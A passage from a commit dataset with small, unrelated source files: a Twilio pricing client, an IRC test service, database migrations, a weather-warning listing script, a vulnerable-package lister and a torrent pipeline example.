self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
<commit_before><commit_msg>Move pricing client into pricing init<commit_after>
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
Move pricing client into pricing initfrom twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
<commit_before><commit_msg>Move pricing client into pricing init<commit_after>from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
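A short usage sketch (hypothetical credentials; it only touches the attributes the constructor above actually defines):

from twilio.rest.pricing import TwilioPricingClient

client = TwilioPricingClient(account='ACxxxxxxxxxxxxxxxx', token='your_auth_token')
voice_pricing = client.voice            # resource rooted at {base}/v1, per uri_base above
numbers_pricing = client.phone_numbers  # likewise built from the same uri_base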
|
48ba0b266d7c87473e2813d56cdc2fd33e8e85df
|
txircd/modules/test/testserv.py
|
txircd/modules/test/testserv.py
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
Create a test service testing basic service functionality
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.
|
Python
|
bsd-3-clause
|
ElementalAlchemist/txircd,Heufneutje/txircd
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
<commit_before><commit_msg>Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.<commit_after>
|
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
<commit_before><commit_msg>Create a test service testing basic service functionality
Put it under a new test/ directory for all such basic test modules.<commit_after>from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData
from txircd.service import Service
from zope.interface import implements
class TestServ(Service):
implements(IPlugin, IModuleData)
name = "TestServ"
help = "A test service."
user_cmd_aliases = {
"TEST": (20, "TEST"),
"TSERV": (20, None),
}
def serviceCommands(self):
return {
"TEST": (self.handleTest, False, "a test command",
"This command does nothing but send a notice echoing the input params, "
"and is intended for testing the functionality of a very basic service."),
}
def handleTest(self, user, params):
self.tellUser(user, " ".join(params))
testServ = TestServ()
|
|
fdec47174afa276d3d173567bef62eb9b31cd5d0
|
alembic/versions/4e1d46e710a2_use_jsonb_for_strokes.py
|
alembic/versions/4e1d46e710a2_use_jsonb_for_strokes.py
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
Use JSONB for storing strokes
|
Use JSONB for storing strokes
|
Python
|
agpl-3.0
|
favien/favien,favien/favien,favien/favien
|
Use JSONB for storing strokes
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
<commit_before><commit_msg>Use JSONB for storing strokes<commit_after>
|
"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
Use JSONB for storing strokes"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
<commit_before><commit_msg>Use JSONB for storing strokes<commit_after>"""use jsonb for strokes
Revision ID: 4e1d46e710a2
Revises: 5a7ec3d139df
Create Date: 2015-05-25 19:47:45.924915
"""
from alembic.op import execute
# revision identifiers, used by Alembic.
revision = '4e1d46e710a2'
down_revision = '5a7ec3d139df'
branch_labels = None
depends_on = None
def upgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSONB USING strokes::JSONB')
def downgrade():
execute('ALTER TABLE canvases ALTER strokes TYPE JSON USING strokes::JSON')
|
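The same change could also be written with Alembic's higher-level op.alter_column instead of raw SQL; a hedged alternative sketch, assuming the standard PostgreSQL dialect types and Alembic's postgresql_using keyword:

from alembic import op
from sqlalchemy.dialects import postgresql

def upgrade():
    # Equivalent to the raw ALTER TABLE above; postgresql_using supplies the cast.
    op.alter_column('canvases', 'strokes',
                    type_=postgresql.JSONB(),
                    postgresql_using='strokes::jsonb')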
|
5ce0e1a3320ac994737436803b8bd0923142e0af
|
htdocs/json/vtec_events.py
|
htdocs/json/vtec_events.py
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
Python
|
mit
|
akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem
|
Add quick hack of a VTEC listing, will make JSON when time permits
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add quick hack of a VTEC listing, will make JSON when time permits<commit_after>
|
#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
Add quick hack of a VTEC listing, will make JSON when time permits#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add quick hack of a VTEC listing, will make JSON when time permits<commit_after>#!/usr/bin/env python
"""Listing of VTEC events for a WFO and year"""
import cgi
import sys
import json
def report(wfo, year):
"""Generate a report of VTEC ETNs used for a WFO and year
Args:
wfo (str): 3 character WFO identifier
year (int): year to run for
"""
import psycopg2
pgconn = psycopg2.connect(database='postgis', host='iemdb', user='nobody')
cursor = pgconn.cursor()
table = "warnings_%s" % (year,)
cursor.execute("""
SELECT distinct phenomena, significance, eventid,
issue at time zone 'UTC' as utc_issue,
init_expire at time zone 'UTC' as utc_expire from
"""+table+""" WHERE wfo = %s
ORDER by phenomena ASC, significance ASC, utc_issue ASC
""", (wfo,))
print '%s report for %s' % (wfo, year)
lastrow = [None]*5
for row in cursor:
if row[0] != lastrow[0] or row[1] != lastrow[1]:
print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
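Since the message anticipates a JSON version, a minimal sketch of how the same query results could be serialized instead of printed as fixed-width text (hypothetical helper; json is already imported in the script above):

def report_json(wfo, year, cursor):
    # Collect the columns selected by the query above into a JSON document.
    events = [dict(phenomena=row[0], significance=row[1], eventid=row[2],
                   issue=row[3].isoformat(), expire=row[4].isoformat())
              for row in cursor]
    return json.dumps(dict(wfo=wfo, year=year, events=events))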
|
d31e468de531b4d9ccb1eba871d0d9b458f6dc4f
|
CheckVulnerableEntries.py
|
CheckVulnerableEntries.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
Add a tool to list pending issues
|
Add a tool to list pending issues
|
Python
|
mpl-2.0
|
rgacogne/ArchCVEToJSON
|
Add a tool to list pending issues
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
<commit_before><commit_msg>Add a tool to list pending issues<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
Add a tool to list pending issues#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
<commit_before><commit_msg>Add a tool to list pending issues<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
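For reference, the fields the script reads imply database entries shaped roughly like this (illustrative values only, not real ArchCVEToJSON data):

issues = [
    {
        "packages": ["openssl"],
        "status": "Vulnerable",
        "vulnerableVersion": "1.0.1f-1",
        "disclosureDate": "2014-04-07",
    },
]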
|
853caeba0d11b7ecf10ad74e19cd8b3cd3c82084
|
Sketches/RJL/Torrent/Examples/example2.py
|
Sketches/RJL/Torrent/Examples/example2.py
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
Test and example for new btkam.py TorrentClient.
|
Test and example for new btkam.py TorrentClient.
|
Python
|
apache-2.0
|
sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia
|
Test and example for new btkam.py TorrentClient.
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
<commit_before><commit_msg>Test and example for new btkam.py TorrentClient.<commit_after>
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
Test and example for new btkam.py TorrentClient.from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
<commit_before><commit_msg>Test and example for new btkam.py TorrentClient.<commit_after>from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
|
5f7bc24308bd9e3098612813ba4d5da0cd532cb6
|
python/testdata/counter.py
|
python/testdata/counter.py
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
Add a very simple test program for distributed Python.
|
Add a very simple test program for distributed Python.
|
Python
|
apache-2.0
|
snyderek/floating_temple,snyderek/floating_temple,snyderek/floating_temple
|
Add a very simple test program for distributed Python.
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
<commit_before><commit_msg>Add a very simple test program for distributed Python.<commit_after>
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
Add a very simple test program for distributed Python.from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
<commit_before><commit_msg>Add a very simple test program for distributed Python.<commit_after>from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
|
d9c1b22ede009c4d75827232dd32fbf31f96ca67
|
chnnlsdmo/chnnlsdmo/migrations/0002_vote_created.py
|
chnnlsdmo/chnnlsdmo/migrations/0002_vote_created.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
Add migration to provide Vote timestamp column
|
Add migration to provide Vote timestamp column
|
Python
|
bsd-3-clause
|
shearichard/django-channels-demo,shearichard/django-channels-demo,shearichard/django-channels-demo
|
Add migration to provide Vote timestamp column
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
<commit_before><commit_msg>Add migration to provide Vote timestamp column<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
Add migration to provide Vote timestamp column# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
<commit_before><commit_msg>Add migration to provide Vote timestamp column<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
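The migration corresponds to a model change along these lines (a sketch; the one-off datetime default in the operation above exists only to backfill existing rows, which is why preserve_default=False discards it afterwards):

from django.db import models

class Vote(models.Model):
    # auto_now_add stamps each vote with its creation time automatically.
    created = models.DateTimeField(auto_now_add=True)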
|
14d19d4d515ad5d181cc7e0bebd3929b22b82972
|
backend/breach/migrations/0018_target_samplesize.py
|
backend/breach/migrations/0018_target_samplesize.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
Add migration for Target samplesize
|
Add migration for Target samplesize
|
Python
|
mit
|
dimkarakostas/rupture,dimriou/rupture,esarafianou/rupture,dionyziz/rupture,dionyziz/rupture,dimkarakostas/rupture,dionyziz/rupture,dimkarakostas/rupture,dionyziz/rupture,dimriou/rupture,dimkarakostas/rupture,dionyziz/rupture,dimriou/rupture,esarafianou/rupture,dimriou/rupture,dimkarakostas/rupture,dimriou/rupture,esarafianou/rupture,esarafianou/rupture
|
Add migration for Target samplesize
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
